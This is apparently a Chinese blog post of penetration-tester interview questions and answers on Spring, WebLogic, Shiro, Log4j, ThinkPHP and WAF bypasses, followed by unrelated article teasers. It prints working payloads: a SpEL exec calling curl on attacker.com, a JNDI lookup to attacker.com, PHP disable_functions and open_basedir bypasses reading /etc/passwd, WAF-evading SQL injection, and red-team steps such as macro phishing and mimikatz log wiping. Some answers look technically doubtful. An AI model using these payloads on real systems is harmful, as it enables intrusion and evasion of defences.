2025年渗透测试面试题总结-天融信[社招]渗透测试工程师(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

天融信[社招]渗透测试工程师

一、Java Spring Boot组件漏洞

1. CVE-2018-1270(WebSocket RCE)

2. CVE-2018-1273(Spring Data SpEL注入)

3. Actuator未授权访问

二、Weblogic漏洞与协议利用

三、ThinkPHP+宝塔WebShell绕过

1. disable_functions绕过

2. 宝塔环境突破

四、Android四大组件安全风险

五、Shiro 550 vs 721

六、验证码绕过方法

七、SQL宽字节注入实例

八、HTTP 304状态码

九、Log4j2 Lookup风险(CVE-2021-44228)

十、渗透测试标准流程

十一、漏洞验证双视角

十二、护网实战工作清单

十三、云WAF对抗技术

1. 定位云WAF真实IP

2. SQL注入绕过示例

十四、命令注入绕过宝塔限制

十五、溯源技术框架

十六、安全设备实战经验

十七、网络问题排查步骤

十八、WAF绕过技术矩阵

十九、宝塔WAF绕过方案

1. SQL注入绕过

2. 文件读取绕过

二十、云WAF定位技术

1. IP定位

2. 历史记录分析

二十一、云WAF SQL注入绕过

绕过原理:

二十二、命令注入突破宝塔限制

1. open_basedir绕过

2. disable_functions绕过

天融信[社招]渗透测试工程师

1. **Java Spring Boot 组件及其漏洞**- **Spring Websocket RCE (CVE-2018-1270)**:此漏洞存在于Spring-messaging模块的WebSocket实现中,允许攻击者通过发送特定消息至内存中的STOMP代理,进而导致远程代码执行(RCE)。- **Spring Data RCE (CVE-2018-1273)**:该漏洞源于SpEL表达式注入,攻击者可通过注入恶意SpEL表达式,在Spring Data组件中执行任意命令。- **Spring Data REST RCE (CVE-2017-8046)**:Spring Data REST暴露的对象可通过URL操控,攻击者通过精心构造的JSON数据传递给服务器,从而在服务器上执行任意Java代码。- **Spring Boot 目录遍历 (CVE-2021-21234)**:Spring Boot Actuator中的logview功能因未能充分校验基本文件夹参数而导致目录遍历漏洞,攻击者可借此访问超出日志记录基目录以外的文件。- **Spring Actuator 未授权访问**: 若Spring Boot应用中的Actuator端点配置不当,可能导致敏感信息泄露、XML外部实体注入(XXE)、甚至RCE等安全风险。
2.  **Weblogic常见漏洞及IIOP/T3协议** 
3. **ThinkPHP结合宝塔环境的WebShell绕过方法** - disable_function插件绕过: 攻击者可能会利用某些方式绕过disable_function的安全限制来上传并执行WebShell。
4. **Android测试中与Web测试相关的四大组件**- **Activity、ContentProvider、BroadcastReceiver、Service**
5. **Shiro 550与721漏洞区别**- **Shiro-550**:主要涉及Shiro rememberMe功能的反序列化漏洞,由于默认加密密钥硬编码,攻击者可构造恶意对象序列化后放入Cookie,从而在服务器端执行恶意代码。- **Shiro-721**:相较于550,Shiro在此版本中对rememberMe字段使用AES-128-CBC加密,但仍存在 Padding Oracle攻击的可能性,攻击者可以构造恶意Payload实现反序列化攻击。尽管key不再是硬编码,但仍然是动态生成并在登录后用于生成恶意rememberMe Cookie。
6. 验证码绕过方法 
7. 逻辑漏洞示例 
8. SQL注入中的宽字节注入概念与实例 
9.  HTTP状态码304及其在协商缓存中的作用 
10. Log4j2框架下Lookup服务引发的安全风险 
11. Fastjson反序列化漏洞原理与利用手法 
12. 渗透测试的整体思路 
13.  如何验证漏洞报告的真实性(包括运维与渗透测试角度) 
14. 描述护网经历中完成的具体工作内容 
15. 溯源经历分享 
16. 接触过的安全设备及是否有实际操作经验 
17. 对于客户反映的网络访问问题排查步骤 
18.  WAF绕过的一系列思路,包括但不限于SQL注入、正则绕过、编码方式绕过、Content-Type篡改、Unicode绕过等 
19. 特定场景下绕过宝塔WAF的方法 
20. 寻找云WAF部署位置的思路 
21. SQL注入针对云WAF的绕过技术 
22. 命令注入绕过方法,尤其是在宝塔环境中应对open_basedir和disable_functions限制的手法 

一、Java Spring Boot组件漏洞

1. CVE-2018-1270(WebSocket RCE)
  • 原理:STOMP消息头selector参数未过滤SpEL表达式
    httpCONNECT selector: T(java.lang.Runtime).getRuntime().exec('curl attacker.com') 
  • 影响版本:Spring Framework 5.0.0 - 5.0.5
  • 修复:升级至≥5.0.6,配置@EnableWebSocketMessageBroker时添加.setSelectorHeaderEnabled(false)
2. CVE-2018-1273(Spring Data SpEL注入)
  • 攻击路径
    POST /users?name[#this.getClass().forName("java.lang.Runtime").exec("id")]=test
  • 防御:全局过滤#{}${}符号,禁用@Query中的SpEL解析
3. Actuator未授权访问
  • 风险端点
    /actuator/env(泄露环境变量)
    /actuator/heapdump(获取内存敏感数据)
  • 加固方案
    yamlmanagement: endpoints: web: exposure: include: health,info # 仅开放安全端点 endpoint: shutdown: enabled: false 

二、Weblogic漏洞与协议利用

漏洞协议利用手法修复方案
CVE-2020-2551IIOPJNDI注入ldap://恶意地址关闭7002端口
CVE-2019-2725T3绕过黑名单加载恶意类限制T3协议访问(7001)
CVE-2017-10271HTTPXMLDecoder反序列化<object>标签删除wls-wsat.war 组件

三、ThinkPHP+宝塔WebShell绕过

1. disable_functions绕过
php// 利用FFI执行命令(PHP≥7.4) $ffi = FFI::cdef("int system(const char *command);"); $ffi->system("id > /tmp/output");
2. 宝塔环境突破
  • open_basedir绕过
    phpmkdir('/tmp/bypass'); chdir('/tmp/bypass'); ini_set('open_basedir','..'); // 向上穿越目录 
  • WAF规则绕过
    union/*%0a*/select → 换行符分割检测规则

四、Android四大组件安全风险

组件攻击场景防御方案
Activity导出组件未鉴权(android:exported=true)显式设置exported="false"
ContentProviderURI路径遍历(content://com.example.DBProvider/../etc/passwd )启用pathPermissions校验
BroadcastReceiver恶意消息伪造(Intent携带敏感数据)使用LocalBroadcastManager
Service未授权启动(startService未校验)添加自定义权限检查

五、Shiro 550 vs 721

特性Shiro-550Shiro-721
密钥机制硬编码(默认kPH+bIxk5D2deZiIxcaaaA==动态生成(需捕获合法Cookie)
加密方式AES-CBC弱加密AES-CBC + Padding Oracle攻击
利用工具shiro-exploit.jar 一键化利用需配合Burp Collaborator

六、验证码绕过方法

  1. OCR识别:Tesseract识别简单图形码(成功率>80%)
  2. 接口重放:未绑定Session的验证码请求(/captcha?t=timestamp
  3. 逻辑缺陷:响应包返回验证结果(如{"code":0,"captcha_valid":true}
  4. 短信轰炸:拦截验证码请求至攻击者手机(Burp Repeater重放)

七、SQL宽字节注入实例

  • 漏洞场景:MySQL + GBK编码
  • 攻击输入
    id=1%df' AND 1=1-- → 转义后:1%df\' → GBK解码为1運'
  • 防御方案
    java// 强制UTF-8编码 new String(request.getParameter("id").getBytes("ISO-8859-1"), "UTF-8");

八、HTTP 304状态码

  • 协商缓存机制
    httpGET /logo.jpg HTTP/1.1 If-Modified-Since: Wed, 01 Jun 2025 07:28:00 GMT HTTP/1.1 304 Not Modified // 资源未变更,使用本地缓存 
  • 安全风险:缓存投毒(Cache Poisoning)篡改304响应头注入恶意脚本

九、Log4j2 Lookup风险(CVE-2021-44228)

  • 攻击原理
    ${jndi:ldap://attacker.com/Exploit} 触发JNDI注入
  • 应急方案
    1. 升级Log4j至≥2.17.0
    2. 添加JVM参数:-Dlog4j2.formatMsgNoLookups=true

十、渗透测试标准流程

mermaidgraph TD A[信息收集] --> B[漏洞扫描] B --> C{是否可利用?} C -->|是| D[漏洞利用] C -->|否| A D --> E[权限提升] E --> F[横向移动] F --> G[痕迹清理]

十一、漏洞验证双视角

验证方式运维视角渗透视角
环境复现Docker容器隔离测试VMware快照还原
分析工具Wireshark抓包分析流量特征Burp Suite Intruder模块爆破
无害化验证DNS外带(ceye.io )执行ping 127.0.0.1

十二、护网实战工作清单

红队任务

  1. 鱼叉攻击:伪造HR邮件投递Excel 4.0宏病毒
  2. 横向移动:利用PrintNightmare(CVE-2021-34527)获取域控权限
  3. 痕迹清理:使用mimikatz清除日志
    蓝队任务
  • 部署EDR实时阻断可疑进程(如Carbon Black)
  • 分析NetFlow流量检测异常IIOP/T3连接

十三、云WAF对抗技术

1. 定位云WAF真实IP
  • 查询历史DNS记录:securitytrails.com
  • 全球Ping扫描:fofa.info 搜索header="X-Cache: HIT"
2. SQL注入绕过示例
sql/* 阿里云WAF绕过 */ SELECT/*!50000+0*/user,password FROM users WHERE id=1 

十四、命令注入绕过宝塔限制

bash# 绕过open_basedir mkdir -p /tmp/dir; cd /tmp/dir; chroot . # 绕过disable_functions /???/??t /???/p??sw? # 等价于 /bin/cat /etc/passwd 

十五、溯源技术框架

mermaidgraph LR A[攻击线索] --> B[IP溯源] A --> C[样本分析] B --> B1[威胁情报平台:VirusTotal] C --> C1[沙箱动态分析:Any.Run] B1 --> D[攻击者画像] C1 --> D 

十六、安全设备实战经验

设备类型操作经验应用场景
WAF策略配置/日志分析拦截SQL注入/CC攻击
EDR进程溯源/威胁狩猎检测勒索软件
NGFW策略优化/IPS调优阻断C2通信

十七、网络问题排查步骤

mermaidgraph TD A[用户反馈] --> B[链路测试] B --> C{是否通?} C -->|是| D[服务端口检测] C -->|否| H[检查本地DNS] D --> E{端口开放?} E -->|是| F[应用日志分析] E -->|否| G[防火墙策略检查]

十八、WAF绕过技术矩阵

类型方法案例
SQL注入Unicode编码:%u0055NION%u0053%u0045%u004c%u0045%u0043%u0054
正则绕过换行符分割:union%0aall%0aselect绕过union\s+select规则
Content-Type篡改表单转文件上传:Content-Type: multipart/form-data绕过JSON参数检查

十九、宝塔WAF绕过方案

1. SQL注入绕过
sqlSELECT/*bt*/user FROM users # 注释符干扰规则 
2. 文件读取绕过
httpGET /static/%2e%2e/etc/passwd HTTP/1.1 # URL编码绕过路径检测 

二十、云WAF定位技术

1. IP定位
bash# 真实IP发现 dig +short target.com A # 云WAF IP dig +short target.com TXT # 查询SPF记录中的真实IP 
2. 历史记录分析
  • 工具:securitytrails.com
  • 关键词:historical DNS records

二十一、云WAF SQL注入绕过

sql/* 腾讯云WAF绕过 */ x=1+union/*!00000all*/select 1,2,3 
绕过原理:

利用MySQL版本特性注释/*!50000*/中的数字大于真实版本号(如MySQL 5.7用/*!60000*/


二十二、命令注入突破宝塔限制

1. open_basedir绕过
ph<?php mkdir('/tmp/exp'); chdir('/tmp/exp'); ini_set('open_basedir','..'); // 目录穿越 chdir('..'); chdir('..'); readfile('/etc/passwd'); ?>
2. disable_functions绕过
bash# LD_PRELOAD劫持 echo '<?php putenv("LD_PRELOAD=/tmp/hack.so"); mail("","","",""); ?>' > shell.php 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.pswp.cn/web/83022.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

华为OD机考-内存冷热标记-多条件排序

import java.util.*;public class DemoTest5 {public static void main(String[] args) {Scanner in new Scanner(System.in);// 注意 hasNext 和 hasNextLine 的区别while (in.hasNextLine()) { // 注意 while 处理多个 caseint a in.nextInt();int[] arr new int[a];for(int…

PPT转图片拼贴工具 v3.0

软件介绍 这个软件就是将PPT文件转换为图片并且拼接起来。 这个代码支持导入单个文件也支持导入文件夹 但是目前还没有解决可视化界面问题。 效果展示 软件源码 import os import re import win32com.client from PIL import Image from typing import List, Uniondef con…

NLP学习路线图(三十):微调策略

在自然语言处理领域,预训练语言模型(如BERT、GPT、T5)已成为基础设施。但如何让这些“通才”模型蜕变为特定任务的“专家”?微调策略正是关键所在。本文将深入剖析七种核心微调技术及其演进逻辑。 一、基础概念:为什么需要微调? 预训练模型在海量语料上学习了通用语言表…

讲述我的plc自学之路 第十三章

我和lora都是那种理想主义者&#xff0c;这是我们的共同之处。但是lora比我要更文艺一些&#xff0c;她读的书毕竟比我多&#xff0c;上的又是名校。受北大人文气息的熏陶&#xff0c;她总是对爱情充满了太多幻想。 “说说你的过往吧&#xff0c;lora。”我给lora倒了一杯啤酒&…

GPU虚拟化

引言 现有如下环境&#xff08;注意相关配置&#xff1a;只有一个k8s节点&#xff0c;且该节点上只有一张GPU卡&#xff09;&#xff1a; // k8s版本 $ kubectl version Client Version: version.Info{Major:"1", Minor:"22", GitVersion:"v1.22.7&…

【免费数据】2005-2019年我国272个地级市的旅游竞争力多指标数据(33个指标)

旅游业是一个城市的重要产业构成。旅游竞争力是一个城市竞争力的重要构成部分。一个城市的旅游竞争力反映了其在旅游市场竞争中的比较优势。 今日我们分享的是2005-2019年我国272个地级市的旅游竞争力多指标数据&#xff01;该数据集源自2025年4月发表于《地理学报》的论文成果…

AI智能驱动浏览器工具Browser Use详解

前言 在之前关于 AI 测试相关的几篇文章中,我们分别介绍了通过 playwright-mcp,以及 midscene.js、magentic ui 等几个不同的 AI 浏览器工具,实现 AI 驱动自动化测试的方法介绍。而其实在这些不断涌现的新工具出现之前,还有一个更早推出(2024.11),也同样还在不断完善的…

新成果:GaN基VCSEL动态物理模型开发

作为高速数据传输与光电信号处理的核心器件&#xff0c;垂直腔面发射激光器&#xff08;VCSEL&#xff09;在高速光通信、激光雷达等领域应用广泛&#xff0c;其动态特性直接关联器件调制速率及稳定性等关键参数。近期&#xff0c;天津赛米卡尔科技有限公司技术团队开发了GaN基…

嵌入式学习笔记 - freeRTOS xTaskResumeAll( )函数解析

第一部分 移除挂起等待列表中的任务 while( listLIST_IS_EMPTY( &xPendingReadyList ) pdFALSE )//循环寻找直到为空&#xff0c;把全部任务扫描一遍 { pxTCB ( TCB_t * ) listGET_OWNER_OF_HEAD_ENTRY( ( &xPendingR…

大数据+智能零售:数字化变革下的“智慧新零售”密码

大数据+智能零售:数字化变革下的“智慧新零售”密码 大家好,今天咱们聊聊一个火到不行的话题:大数据在智能零售中的应用。这个领域,不仅是技术的“硬核战场”,更是商业创新的风口浪尖。谁能玩转数据,谁就能掌控消费者心智,实现销售爆发。 咱们不搞枯燥学术,而是用最“…

react 常见的闭包陷阱深入解析

一、引子 先来看一段代码,你能说出这段代码的问题在哪吗? const [count, setCount] = useState(0); useEffect(() => {const timer = setTimeout(() => {setCount(count + 1);}, 1000);return () => clearTimeout(timer); }, []);正确答案: 这段代码存在闭包陷阱…

零基础在实践中学习网络安全-皮卡丘靶场(第十五期-URL重定向模块)

本期内容和之前的CSRF&#xff0c;File inclusion有联系&#xff0c;复习后可以更好了解 介绍 不安全的url跳转 不安全的url跳转问题可能发生在一切执行了url地址跳转的地方。如果后端采用了前端传进来的(可能是用户传参,或者之前预埋在前端页面的url地址)参数作为了跳转的目…

Python训练营---DAY48

DAY 48 随机函数与广播机制 知识点回顾&#xff1a; 随机张量的生成&#xff1a;torch.randn函数卷积和池化的计算公式&#xff08;可以不掌握&#xff0c;会自动计算的&#xff09;pytorch的广播机制&#xff1a;加法和乘法的广播机制 ps&#xff1a;numpy运算也有类似的广播机…

什么是ANSYS ACT? ACT又可以分为哪几类?

ANSYS作为目前仿真界主流软件之一&#xff0c;除了给用户提供其强大的功能之外&#xff0c;还给用户提供了高度自定义定制的权限。所谓定制&#xff0c;也即用户可以根据自己仿真需求修改现有功能并展示全新功能的产品内操作。定制的目标是改变现有的用户体验&#xff0c;以满足…

电路图识图基础知识-电动机正反转控制电路详解(二十)

1. 转换开关手动正反转控制电路 转换开关&#xff08;QS&#xff09;又称倒顺开关&#xff0c;是一种手动控制装置&#xff0c;可切换电动机的旋转方向。它具有三个工作位置&#xff1a;正向、停止和反向。 工作原理&#xff1a; 闭合总电源开关 QS若需正向运转&#xff0c;将…

Spring Boot微服务架构(十):Docker与K8S部署的区别

Spring Boot微服务在Docker与Kubernetes&#xff08;K8S&#xff09;中的部署存在显著差异&#xff0c;主要体现在技术定位、管理能力、扩展性及适用场景等方面。以下是两者的核心区别及实践对比&#xff1a; 一、技术定位与核心功能 Docker 功能&#xff1a;专注于单节点容器化…

性能剖析:在 ABP 框架中集成 MiniProfiler 实现性能可视化诊断

&#x1f680; 性能剖析&#xff1a;在 ABP 框架中集成 MiniProfiler 实现性能可视化诊断 &#x1f4da; 目录 &#x1f680; 性能剖析&#xff1a;在 ABP 框架中集成 MiniProfiler 实现性能可视化诊断一、为什么选择 MiniProfiler&#xff1f; &#x1f9d0;二、集成 MiniProf…

ESP32 在Arduino开发环境中,如果程序运行报错如何定位程序报错是哪行代码

在开发中&#xff0c;我们常常会遇到编译正常&#xff0c;但是运行过程中程序报错&#xff0c;然后重启&#xff0c;在这种情况下&#xff0c;又没法知道是哪段程序引起的&#xff0c;现在我们就来解决这个问题。 其实ESP32的SDK中已经附带这些debug的工具了。 首先如果我们程…

Python 包管理器 uv 介绍

Python 包管理器 uv 全面介绍 uv 是由 Astral&#xff08;热门工具 Ruff 的开发者&#xff09;推出的下一代高性能 Python 包管理器和构建工具&#xff0c;用 Rust 编写。它旨在解决传统工具&#xff08;如 pip、virtualenv、pip-tools&#xff09;的性能瓶颈&#xff0c;同时…

win10启动时小键盘灯默认不亮怎么办

第一步&#xff0c;按winR&#xff0c;打开运行。 第二步&#xff0c;输入regedit&#xff0c;打开注册表。 第三步&#xff0c;在注册表编辑器中,依次展开HKEY_ USERS --》.DEFAULT --》Control Panel --》Keyboard &#xff0c; 第四步&#xff0c;选中Keyboard 之后在右侧窗…